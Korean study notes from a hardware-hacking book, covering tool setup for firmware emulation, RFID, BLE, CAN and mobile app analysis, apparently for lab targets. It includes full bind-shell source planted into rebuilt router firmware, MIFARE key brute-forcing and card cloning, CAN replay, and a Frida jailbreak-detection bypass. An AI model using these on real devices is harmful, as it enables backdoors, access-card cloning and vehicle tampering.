수정중입니다..
Practical IoT hacking Book 의 내용을 공부하며 정리중임을 밝혀둡니다..
Binary Analysis
Ghidra
# jdk 11+ needed
sudo apt install openjdk-11-jdk
sudo apt install openjdk-11-jre-headless
wget https://github.com/NationalSecurityAgency/ghidra/releases/download/Ghidra_10.0.2_build/ghidra_10.0.2_PUBLIC_20210804.zip
unzip ghidra_10.0.2_PUBLIC_20210804.zip
cd ghidra_10.0.2_PUBLIC
./ghidraRun
Okteta
sudo apt install snapd
sudo snap install okteta
okteta

Network Analysis
burpsuite
https://portswigger.net/burp/communitydownload
chmod +x burpsuite_community_linux_v<your version here>.sh
./burpsuite_community_linux_v<your version here>.sh
browser setup, getting started
https://medium.com/swlh/getting-started-with-burp-suite-on-ubuntu-3c1e665122a3


Firmware Binary Emulation
A binary -> QEMU
Complete firmware -> FIRMADYNE
QEMU
sudo apt install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
# emulate a MIPS big-endian executable
$ qemu-mips -L ./squashfs-root/ ./squashfs-root/bin/zcat
# Booting the kernel image ( arm / versatile-pb ) with QEMU without a filesystem, from the MELP2 book
$ QEMU_AUDIO_DRV=none qemu-system-arm -m 256M -nographic -M versatilepb -kernel arch/arm/boot/zImage -append "console=ttyAMA0,115200" -dtb versatile-pb.dtb
# Booting kernel, the initramfs with QEMU
$ QEMU_AUDIO_DRV=none qemu-system-arm -m 256M -nographic -M versatilepb -kernel arch/arm/boot/zImage -append "console=ttyAMA0 rdinit=/bin/sh" -dtb arch/arm/boot/dts/versatile-pb.dtb -initrd ../initramfs.cpio.gz
FIRMADYNE
sudo apt install busybox-static fakeroot git dmsetup kpartx netcat-openbsd nmap python-psycopg2 python3-psycopg2 snmp uml-utilities util-linux vlan
# download
git clone --recursive https://github.com/firmadyne/firmadyne.git
sudo ./setup.sh
sudo ./download.sh
# extractor
sudo -H pip install git+https://github.com/ahupp/python-magic
sudo -H pip install git+https://github.com/sviehb/jefferson
#database
sudo apt-get install postgresql
sudo -u postgres createuser -P firmadyne (with password firmadyne)
sudo -u postgres createdb -O firmadyne firmware
sudo -u postgres psql -d firmware < ./database/schema
# edit firmadyne.config / path to repository
# extract the firmware to images from the compressed file
$ python3 ./sources/extractor/extractor.py -b Netgear -sql 127.0.0.1 -np -nk "D6000_V1.0.0.41_1.0.1_FW.zip"
optional arguments:
-h, --help show this help message and exit
-sql SQL Hostname of SQL server
-nf Disable extraction of root filesystem (may decrease extraction time)
-nk Disable extraction of kernel (may decrease extraction time)
-np Disable parallel operation (may increase extraction time)
-b BRAND Brand of the firmware image
# identify the firmware's architecture and store in the FIRMADYNE DB
$ ./scripts/getArch.sh ./images/1.tar.gz
# store information in the DB from the extracted image and generate a QEMU image
$ ./scripts/tar2db.py -i 1 -f ./images/1.tar.gz
$ sudo ./scripts/makeImage.sh 1
# network
$ ./scripts/inferNetwork.sh 1
# begin the emulation
$ ./scratch/1/run.sh
Backdooring Firmware
OpenWrt toolchain ( firmware compiler for SoC routers based on MIPS processors )
sudo apt install binutils bzip2 diff find flex gawk gcc-6+ getopt grep install libc-dev libz-dev make4.1+ perl python3.6+ rsync subversion unzip which
git clone https://github.com/openwrt/openwrt
cd openwrt
./scripts/feeds update -a
./scripts/feeds install -a
menuconfig
make toolchain/install
$ export STAGING_DIR="$HOME/pih"
$ ./openwrt/staging_dir/toolchain-mips_24kc_gcc-8.4.0_musl/bin/mips-openwrt-linux-gcc bindshell.c -o bindshell -static -EB -march=24kc
# bindshell: modified version of Osanda Malith's code, as used in the Practical IoT Hacking book
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
/* NOTE(review): fork(), write(), dup2(), execve() and close() are used below
 * without <unistd.h>; they compile only through implicit declarations (a
 * warning with the gcc-8 toolchain named above). */

/* TCP port the listener binds to, on every local IPv4 address (INADDR_ANY). */
#define SERVER_PORT 9999
/* CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
 * Bind Shell using Fork for my TP-Link mr3020 router running busybox
 * Arch : MIPS
 * mips-linux-gnu-gcc mybindshell.c -o mybindshell -static -EB -march=24kc
 */

/*
 * Entry point.  fork()s once: the original parent returns 0 immediately, the
 * child binds 0.0.0.0:SERVER_PORT, listen()s with a backlog of 1 and loops on
 * accept().  Each accepted connection is handled by a second fork():
 *   - the parent of that fork (server_pid != 0) writes the banner, dup2()s the
 *     client socket onto fds 0, 1 and 2 and execve()s "/bin/busybox sh", so the
 *     listening process itself is replaced by the shell;
 *   - the child of that fork (server_pid == 0) closes clientfd and returns to
 *     accept(), becoming the new listener.
 * No return value of socket/bind/listen/accept/execve is checked, so any
 * failure is silent.  fork() returns -1 on failure, and -1 is non-zero, so a
 * failed second fork also takes the execve() branch.
 * From the defender's side the observable footprint is a /bin/busybox process
 * whose fds 0-2 are a TCP socket on port 9999.
 */
int main() {
    int serverfd, clientfd, server_pid, i = 0;
    char *banner = "[~] Welcome to @OsandaMalith's Bind Shell\n";
    /* argv for execve(); the envp argument below is NULL, so no environment is passed. */
    char *args[] = { "/bin/busybox", "sh", (char *) 0 };
    struct sockaddr_in server, client;
    socklen_t len;
    int x = fork();
    if (x == 0) {  /* child of the first fork: becomes the listener */
        server.sin_family = AF_INET;
        server.sin_port = htons(SERVER_PORT);
        server.sin_addr.s_addr = INADDR_ANY;
        serverfd = socket(AF_INET, SOCK_STREAM, 0);
        bind(serverfd, (struct sockaddr *)&server, sizeof(server));
        listen(serverfd, 1);
        while (1) {
            /* struct sockaddr and struct sockaddr_in are both 16 bytes on Linux. */
            len = sizeof(struct sockaddr);
            clientfd = accept(serverfd, (struct sockaddr *)&client, &len);
            server_pid = fork();
            if (server_pid) {  /* parent of the second fork (or a failed fork): serve this client */
                write(clientfd, banner, strlen(banner));
                /* point stdin, stdout and stderr at the client socket */
                for(; i <3 /*u*/; i++) dup2(clientfd, i);
                execve("/bin/busybox", args, (char *) 0);
                close(clientfd);  /* reached only if execve() fails */
            } close(clientfd);  /* child of the second fork: drop the client and accept() again */
        }
    }
    return 0;  /* original parent exits at once */
}
$ python3 -m http.server 8080
$ wget http://192.168.1.2:8080/bindshell # on router emulation
$ nc 192.168.1.1 9999 # host
Firmware-Mod-Kit
sudo apt install git build-essential zlib1g-dev liblzma-dev python-magic bsdmainutils
git clone https://github.com/rampageX/firmware-mod-kit
cd firmware-mod-kit
# extract
./extract-firmware.sh ../d6000/D6000-V1.0.0.41_1.0.1.bin
# modify
sudo cp ../bindshell fmk/rootfs/bin/smbd
# rebuild
./build-firmware.sh -min
RFID
Proxmark3
# ubuntu for libqt4-dev
# sudo add-apt-repository ppa:rock-core/qt4 && sudo apt update
sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd
git clone https://github.com/Proxmark/proxmark3.git
make clean && make all
# update bootloader / OS, FPGA image
./client/flasher /dev/ttyACM0 -b ./bootrom/obj/bootrom.elf
./client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf
# start
./client/proxmark3 /dev/ttyACM0
# SEARCH
proxmark3> hf search
proxmark3> lf search
# MIFARE classic 1k brand ( hf mf ... )
# BRUTE-FORCE MIFARE all block, 1k with def keys and transfer to default keys / or dump to dumpedkeys.bin
proxmark3> hf mf chk *1 t ./client/default_keys.dic
proxmark3> hf mf chk *1 d ./client/default_keys.dic
# READ 0th block with A key ( 0 sector )
proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF
# READ complete sector
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF
# DUMP MIFARE 1k to dumpdata.bin with keys in dumpedkeys.bin
proxmark3> hf mf dump 1
# RESTORE to a new card with dumpdata.bin
proxmark3> hf mf restore
# RAW Command for non-brand card
hf 14a raw ...
-p power
-b bits
-c with CRC
MIFARE SPEC
26 #REQA
93 20 #Anti-collision
93 70 # SELECT card uid
60 Authenticate with key
#example for classic 1k raw command
proxmark3> hf 14a raw -p -b 7 26
received 2 bytes: 04 00
proxmark3> hf 14a raw -p 93 20
received 5 bytes: 02 0E 88 30 B4
proxmark3> hf 14a raw -p -c 93 70 02 0E 88 30 B4
received 3 bytes: 08 B6 DD
proxmark3> hf 14a raw -p -c 60 00
received 4 bytes: 0E F8 CC 3E
proxmark3>
Bluetooth hacking : BLE
swiss army knife -> Gatttool, hcitool
GATT monitor, simple write > bettercap
sniffer > Ubertooth One / Android
about GATT Server..
https://www.youtube.com/watch?v=eHqtiCMe4NA
Hcitool
$ sudo hcitool lescan
GATTTool
$ hciconfig -a
$ gatttool --help-all
# read command
$ gatttool -b MAC --char-read -a char_handle
# write command
$ gatttool -b MAC --char-write-req -a char_handle -n new_value
#interactive mode CONNECT with random MAC_ADDR
$ sudo gatttool -b B4:99:4C:64:85:12 -I -t random
gatttool -I
[][LE] > connect B4:99:4C:64:85:12
[B4:99:4C:64:85:12][LE]> help
[B4:99:4C:64:85:12][LE]> primary
[B4:99:4C:64:85:12][LE]> characteristics
[B4:99:4C:64:85:12][LE]> char-read-hnd <handle>
[B4:99:4C:64:85:12][LE]> char-read-uuid <UUID>
[B4:99:4C:64:85:12][LE]> char-write-req <handle> <new value>
TROUBLE SHOOT
# hcitool I/O Error
sudo service bluetooth restart
# BLE Connect error
sudo hciconfig hci0 reset
Wireshark
sudo add-apt-repository universe
sudo apt update
sudo apt install wireshark
# to capture vcan0 packets
# after install, select <Yes> for non-superusers ( or sudo dpkg-reconfigure wireshark-common )
sudo usermod -a userid -G wireshark
# Wireshark 2.2+ 이후부터는 BLE 관련 plugin 빌드는 무시해도된다.
In wireshark SETUP
# https://blog.dork94.com/34?category=735144
1. BLE DLT_USER
# 하지않으면 "LE LL" ADV 패킷만 보이고 ATT 패킷을 확인 할 수 없다.
Edit -> Preferences
Under Protocols select DLT_USER and Click Edit
Click [+], enter
btle
in "Payload Protocol", and click OK
Wireshark FILTER expression 알아두기
# https://wiki.wireshark.org/Bluetooth
1. ATT Packets filter
btatt or
btl2cap.cid==0x0004
# PCAP read
$ wireshark -r bledump.pcap
# pipe read
Capture options 톱니바퀴 아이콘 > Manage interfaces 버튼 >
Pipes Tab > [+] > /tmp/pipe 입력, OK
capture interfaces 창에서 START.
이후 Ubertooth 실행.
Ubertooth One + Wireshark
# 2018-12-R1 old version
# sudo apt install ubertooth 하면 되지만 libbtbb 와 같이 최신을 설치하자.
# latest 2020-12-R1
# build, install > https://github.com/greatscottgadgets/ubertooth/wiki/Build-Guide
sudo apt install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev wget pkg-config python3-numpy python3-qtpy python3-distutils python3-setuptools
wget https://github.com/greatscottgadgets/libbtbb/archive/2020-12-R1.tar.gz -O libbtbb-2020-12-R1.tar.gz
tar -xf libbtbb-2020-12-R1.tar.gz
cd libbtbb-2020-12-R1
mkdir build
cd build
cmake ..
make
sudo make install
sudo ldconfig
wget https://github.com/greatscottgadgets/ubertooth/releases/download/2020-12-R1/ubertooth-2020-12-R1.tar.xz
tar -xf ubertooth-2020-12-R1.tar.xz
cd ubertooth-2020-12-R1/host
mkdir build
cd build
cmake ..
make
sudo make install
sudo ldconfig
# Wireshark 2.2+ 이후부터는 plugin 빌드는 무시해도된다.
# update firmware > https://github.com/greatscottgadgets/ubertooth/wiki/Firmware
# live packet capture, following connections, set connection following target
$ ubertooth-btle -f -tB4:99:4C:64:85:12
# log to pcap
$ ubertooth-btle -f -tB4:99:4C:64:85:12 -c bledump.pcap
$ wireshark -r bledump.pcap
# create a pipe to perform an active traffic interception
$ mkfifo /tmp/pipe
$ wireshark & # capture interfaces - INPUT > /tmp/pipe, START
$ ubertooth-btle -f -tB4:99:4C:64:85:12 -c /tmp/pipe

TROUBLE SHOOTING
Wireshark 설정을 했음에도 LE LL 프로토콜, ADV 패킷만 보이고 ATT 패킷이 없다.
1. 최신업데이트
bluetooth packet 을 decode 하기위해서는 libbtbb 이 필요하다.
나의 경우에는 Firmware 2020 + apt install ubertooth (2018버전) 에서 문제 생겨
최신버전과 libbtbb 를 모두 같이 빌드설치후 해결되었다.
2. -A 37,38,39 채널변경
3. 안테나 문제
Android Phone Developer Modes + Wireshark
따로 스니퍼 하드웨어를 가지고있지 않아도 안드로이드 폰의 개발자기능을 패킷스니퍼로 사용할 수 있다.
안드로이드폰의 개발자 모드를 활성화후 Bluetooth HCI snoop log 를 활성화 하면
모든 블루투스 패킷이 캡쳐되며 개발자 모드의 세팅된 버퍼의 크기내에서 log 기록이 남겨지고
USB debugging 을 활성화하여 log 를 pc로 추출하여 Wireshark 로 읽어들일 수 있다.
이때 log 파일이 저장되는 경로가 폰마다 다르기때문에 직접 확인보아야하는데,
접근가능한 파일시스템내에 있다면 다음명령어로 확인 가능 할 수 있다.
$ adb shell cat /etc/bluetooth/bt_stack.conf
# BtSnoop log output file
BtSnoopFileName =/sdcard/btsnoop_hci.log <--your file location
/sdcard/btsnoop_hci.log
/sdcard/oem_log/btsnoop/btsnoop_hci.log
/data/misc/bluetooth/logs/btsnoop_hci.log
보통의 위의 경우에 존재하지만 여러 경우가 있을 수 있고 경로에 접근 가능한경우
$ adb root ( /data 접근의 경우 루팅이 필요하다.)
$ adb pull <path> 로 가져오면된다. ($ adb pull /data/misc/bluetooth/logs/btsnoop_hci.log)
루팅하지않은경우의 방법
나는 redmi 10 note 를 사용하였는데 bt_stack.conf 에 경로설정은 없었고 루팅 후 /data/misc/bluetooth/logs/btsnoop_hci.log 파일을 얻을 수 있었으나, 루팅하지않아 접근 불가능한경우 직접 파일을 노출하는것이아니라
버그리포트를 다운로드하여 로그를 제공한다.
$ adb shell dumpsys bluetooth_manager ( BT log dump 개발자모드에서 체크한경우는 안해도되는듯하다. )
$ adb bugreport anewbugreportfolder
anewbugreportfolder.zip 가 다운로드 되고, 내 redmi 10 note 의 경우에는
운좋게 압축파일안의 FS/data/misc/bluetooth/logs 안에서 btsnoop_hci.log 를 발견할 수 있었다!
운이 안좋은 경우면.. 다음처럼 btsnooz.py 를 구하여 압축파일 내의 txt 에서 추출하여야한다.
btsnooz.py BUG_REPORT.txt > BTSNOOP.log
# 참고
https://stackoverflow.com/questions/28445552/bluetooth-hci-snoop-log-not-generated
https://source.android.com/devices/bluetooth/verifying_debugging#debugging-with-bug-reports
$ wireshark -r btsnoop_hci.log
이후 wireshark 로 ATT 를 확인하기위해 btatt 필터 적용하여 WRITE Command 를 확인 할 수 있었고,
제일 마지막 3바이트가 전구의 RGB 색상을 의미함을 알 수 있었다.



Bettercap
install docker
sudo apt install docker.io
sudo addgroup link9 docker
sudo reboot
install bettercap
sudo apt install libusb-1.0-0
sudo docker pull bettercap/bettercap
sudo docker run -it --privileged --net=host bettercap/bettercap -h
# run enabling BLE module and start capturing
sudo docker run -it --privileged --net=host bettercap/bettercap --eval "ble.recon on"
$ ble.show
$ ble.num <mac addr>
$ ble.write MAC UUID HEX_DATA
$ ble.write b4:99:4c:64:85:12 2a06 58010301FF00CE5F00 # change RGB colorificbulb
btmon
$ sudo btmon
BLE CTF Infinity
Installation
https://link9.tistory.com/entry/BLE-CTF-Infinity-setup-guide-LinuxVSCode

Bettercap 으로 별도로 풀이를 해보았다.
https://link9.tistory.com/entry/BLE-CTF-Infinity-%ED%92%80%EC%9D%B4-with-Bettercap
BLE CTF Infinity 풀이 with Bettercap
https://github.com/hackgnar/ble_ctf — GitHub: hackgnar/ble_ctf, a Bluetooth Low Energy capture the flag
Spooftooph
빌드 오류 해결을 위해 중간에 makefile 을 변경해줘야 한다.
# makefile 의 빌드명령에서 라이브러리를 뒤로 (-o 앞) 으로 옮겨준다.
https://askubuntu.com/questions/940328/how-to-install-spooftooph-on-ubuntu-16-04
apt install libcurses-dev libbluetooth-dev
git clone https://gitlab.com/kalilinux/packages/spooftooph.git
nano makefile
make
sudo make install
$ spooftooph -i hci0 -a 11:22:33:44:55:66
bleSuite / ble-Replay
sudo apt install python2-dev # for gevent
sudo pip2 install -r requirements.txt
sudo python setup.py install
# re-install scapy in https://github.com/secdev/scapy/
git clone https://github.com/secdev/scapy.git
cd scapy
sudo python setup.py install
cd docs
make html
cd ..
# sudo blesuite scan
설치되었으나 정상적으로 동작하지않음.
다른 동글로 다시 시도해 볼예정.
ImportError: No module named Crypto.Cipher
pycrypto 의 문제인데 requirements 를 설치할때 sudo 를 붙여주거나
easy_install 로 해결.
Car Hacking : CAN
CAN via OBD-II Hardware : USB2CAN + Macchina M2 / or CL1000
Communication for CAN packets : SocketCAN, can-utils
Virtual CAN interface : vcan
OBD-II Simulator : ICSim
Wireshark
Replay Attack > candump+canplayer or SavvyCAN
ICSim
Instrument Cluster Simulator
# https://github.com/zombieCraig/ICSim
sudo apt install libsdl2-dev libsdl2-image-dev
sudo apt install can-utils
git clone https://github.com/zombieCraig/ICSim
cd ICSim
make
./setup_vcan.sh
ifconfig vcan0
# Running the dashboard
./icsim vcan0
./controls vcan0
vcan
Setting up the virtual CAN interface / setup_vcan.sh
# load kernel module
sudo modprobe can
sudo modprobe vcan
lsmod | grep can
# set up virtual interface
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0
# verify
ifconfig vcan0
can-utils
# cansniffer cansend candump canplayer cangen
# cangen
$ cangen vcan0
$ wireshark & # select vcan0
# candump
$ candump -a vcan0 # live dump with ascii
$ candump -l vcan0 # log candump-<date>.log to replay attack

# cansniffer - all ID monitor to see change in bytes in CAN
cansniffer -c vcan0
filtering arbitration ID
-000000
+000000
+ID
b # binary mode
# canplayer
$ canplayer -I canfile.log # replay attack
# cansend
$ cansend interface frame
# dividing and narrowing packets to find the Arbitration ID
$ wc -l candump.log
split -l <count> candump.log frame_
SavvyCAN
Without qtserialbus ( and ICSim ), i.e. with a real car only, you can download the easy-to-use prebuilt version.
wget https://github.com/collin80/SavvyCAN/releases/download/V199.1/SavvyCAN-305dafd-x86_64.AppImage
chmod 744 SavvyCAN-305dafd-x86_64.AppImage
./SavvyCAN-305dafd-x86_64.AppImage
To use with ICSim, install qt5, qtserialbus and build SavvyCAN
( 빌드 성공 버젼 = 5.14.2/5.12.9/1.0.245. qtserialbus 버젼이 같은기간의 5.12.9로 빌드하여 성공.
다른버전 또는 다른 qmake 사용시 빌드 실패 경험하였음. )
wget https://download.qt.io/archive/qt/5.14/5.14.2/qt-opensource-linux-x64-5.14.2.run
chmod a+x ./qt-opensource-linux-x64-5.14.2.run
sudo ./qt-opensource-linux-x64-5.14.2.run # full install
sudo apt install qtdeclarative5-dev qttools5-dev g++
git clone https://github.com/qt/qtserialbus
cd qtserialbus
git checkout 5.12.9
/opt/Qt5.14.2/5.14.2/gcc_64/bin/qmake
make
sudo make install
git clone https://github.com/collin80/SavvyCAN
cd SavvyCAN
/opt/Qt5.14.2/5.14.2/gcc_64/bin/qmake CONFIG+=debug
make
sudo make install
#Adding vcan0 to SocketCAN
Connection > Open Connection Window > Add New Device Connection
Select "QT SerialBus Devices"
SerialBus Device Type: socketcan
Port: vcan0
Create a new connection click
# find Arbitration ID
RE Tool > Sniffer
속도계를 변화시키며 ID 를 찾아낸다.
# Sending Custom frames
Send Frame > custom
bus:0 ID: 0x244 Len 5 > data 1 2 3 4 5> Trigger: 30ms Modification d3=d3+1
# 0x244 의 데이터중 30ms 마다 3번째 바이트가 1씩 증가된다. ICSim 으로 확인 할 수있다.
# fuzzing
https://www.youtube.com/watch?v=Q-tP3PpPYVM
USB2CAN 8devices
It works with Linux distributions like Ubuntu and Debian with no additional driver installation.
If the driver is correctly loaded, the CAN interface should be listed when issuing the command sudo ip link.
Set can0 interface speed to 125 Kbps:
sudo ip link set can0 up type can bitrate 125000 sample-point 0.875
Set to can0 to “steady” state (INFO led):
sudo ip link set can0 up
To bring down interface (STAT led):
sudo ip link set can0 down
To get more information about configuration options type:
sudo ip link set can0 type can help

resources
Car Hacking 101: Practical Guide to Exploiting CAN-Bus using Instrument Cluster Simulator — Part I…
Automotive security is really exciting and is an interesting topic of study for many security researchers. Automotive and hardware, for…
Analyzing Android
InsecureBankv2
# python2, pip v2 needed for AndroLab
git clone https://github.com/dineshshetty/Android-InsecureBankv2.git
cd Android-InsecureBankv2
adb install -s InsecureBankv2.apk
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python get-pip.py
cd AndroLabServer
pip install -r requirements.txt # or you can easy_install
$ python app.py
ADB
adb start-server
adb kill-server
adb shell
adb install -s app.apk
adb push <file> <path>
adb pull <file>
$ adb bugreport bugreport_new
$ adb pull /data/misc/bluetooth/logs/btsnoop_hci.log
# Extracting an APK
$ adb shell pm list packages | grep insecure
$ adb shell pm path com.android.insecurebankv2
Analyzing iOS
ipainstaller
cydia 에서 설치하고 .IPA 의 설치와 추출도 가능하다. (-b option)
Filza 등에서 앱내부 iTunesMetadata.plist > softwareVersionBundleId 문자열을 확인한다.
ipainstaller 로 추출하고 윈도우의 3utools 나 리눅스의 scp 를 통하여 PC로 복사한다.
# Extracting .IPA
$ ipainstaller -b <bundle id string>
Containers
OS app or JB app PATH:/Applications
Bundle Container PATH: /var/containers/Bundle/Application/
Data Container PATH: /var/mobile/Containers/Data/Application/
iCloud Container PATH:/private/var/mobile/Library/Mobile Documents/
iOS Keychain PATH:/var/Keychains/keychain-2.db # use DB Browser on win
root user PATH:/var/root
BundleID:
- Bundle Container 의 Info.plist 에 CFBundleIdentifier 를 확인.
- FRIDA 에서 확인. frida -Ua
App Screenshot (Background): [Bundle Container]/Library/Caches/Snapshots (Deprecated)
otool
# Fairplay DRM 적용여부 / 바이너리 load commands 의 cryptid ==1 or 0
$ otool -l <Mach-O> | grep -A4 LC_ENCRYPTION_INFO
# check Mach header of ASLR
$ otool -Vh DVIA-v2
root# otool -Vh DVIA-v2
DVIA-v2:
Mach header
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
MH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 65 7112 NOUNDEFS DYLDLINK TWOLEVEL WEAK_DEFINES BINDS_TO_WEAK PIE
frida-ios-dump
DVIA-v2 - Damn Vulnerable iOS
root# wget https://github.com/prateek147/DVIA-v2/raw/master/DVIA-v2-swift.ipa
use Filza or 3uTools (win) to install
iGoat
plistutil
$ plistutil -i <binary plist>
Keychain Dumper
# on iOS
# "git describe --tags" -> 1.1.0
git clone https://github.com/ptoomey3/Keychain-Dumper # without binary
cd Keychain-Dumper
wget https://github.com/ptoomey3/Keychain-Dumper/releases/download/1.1.0/keychain_dumper-1.1.0.zip
unzip keychain_dumper-1.1.0.zip # compiled binary
chmod +x setup_on_iOS.sh
./setup_on_iOS.sh # print /bin/usr/keychain_dumper not found. / its OK
apt install sqlite3 -y
chmod +x updateEntitlements.sh
./updateEntitlements.sh
keychain_dumper
# 아이폰에 잠금비번을 걸어준다.
# extract keychain data on DVIA2
# keychain_dumper | grep -A8 -B2 <bundle ID ex. com.highaltitudehacks.DVIAswiftv2>
FRIDA
# FRIDA server on iOS cydia
# Add build.frida.re, install Frida
pip3 install frida-tools
frida --version
frida-ps -U
# list processes on iOS
$ frida-ps -U
# running ps
$ frida-ps -Ua

# interactive mode on USB iOS
$ frida -U DVIA-v2
# evaluation CODE example
$ frida -U -e "console.log('Hello World!')" DVIA-v2
$ frida -U -e "console.log(ObjC.classes['JailbreakDetection'].\$ownMethods)" DVIA-v2
$ frida -U -e "Interceptor.attach(ObjC.classes['JailbreakDetection']['isJailbroken'].implementation, { onLeave: function(retval) { retval.replace(ptr('0x0')); console.log('Return value : ' + retval) }});" DVIA-v2
# load .JS scripts to iOS on USB

# DVIA-v2 example / Jailbreak Test1 code
# Hook a func using Imagebase offset / change w0 register
// Hook the function at image base + 0x1cbdd0 inside DVIA-v2: on entry, clear
// x0 and log the module base, the resolved address and the full CPU context.
var moduleBase = Module.findBaseAddress('DVIA-v2');
console.log(moduleBase);

var hookTarget = moduleBase.add('0x1cbdd0');
console.log(hookTarget);

var hookHandlers = {
    onEnter: function (args) {
        this.context.x0 = 0x0;
        console.log(JSON.stringify(this.context));
    }
};
Interceptor.attach(hookTarget, hookHandlers);
$ frida -U -l jb_test.js DVIA-v2
# examples
# ObjC examples
# enum classes
// Print the name of every Objective-C class the runtime knows about.
if (ObjC.available) {
    for (var name in ObjC.classes) {
        console.log(name);
    }
}
# enum methods
// Print the methods implemented directly by the JailbreakDetection class
// ($ownMethods excludes inherited ones).
if (ObjC.available) {
    var targetClass = ObjC.classes["JailbreakDetection"];
    console.log(targetClass.$ownMethods);
}
# hook ObjC func
// Hook JailbreakDetection's isJailbroken method and make it return 0.
if (ObjC.available) {
    var targetImpl = ObjC.classes["JailbreakDetection"]["isJailbroken"].implementation;
    Interceptor.attach(targetImpl, {
        onLeave: function (retval) {
            // retval.replace() writes the new value into the return register;
            // plain assignment to the retval parameter (as in the one-line
            // -e example earlier on this page) would only rebind the local.
            retval.replace(ptr('0x0'));
            console.log('Return value : ' + retval);
        }
    });
}
# also look at AppMon, Needle, drozer (Android)
# https://github.com/interference-security/frida-scripts
Needle
Burpsuite
--> See network analysis
Fridump3 / memory dump, string dump
git clone https://github.com/Nightbringer21/fridump.git
cat README.md
pip install frida
python fridump.py -h
$ python fridump.py -U -r -s DVIA-v2
frida-ios-dump / DRM decrypted IPA dump
# 64bit linux needed
git clone https://github.com/AloneMonkey/frida-ios-dump.git
sudo pip3 install -r requirements.txt --upgrade
sudo apt install libusbmuxd-tools
iproxy 2222 22
python3 dump.py -l # list identifier
# dump google map to IPA
python3 dump.py com.apple.Maps
unable to launch iOS app: The operation couldn’t be completed. Application info provider (FBSApplicationLibrary) returned nil for ""
--> use pip3, python3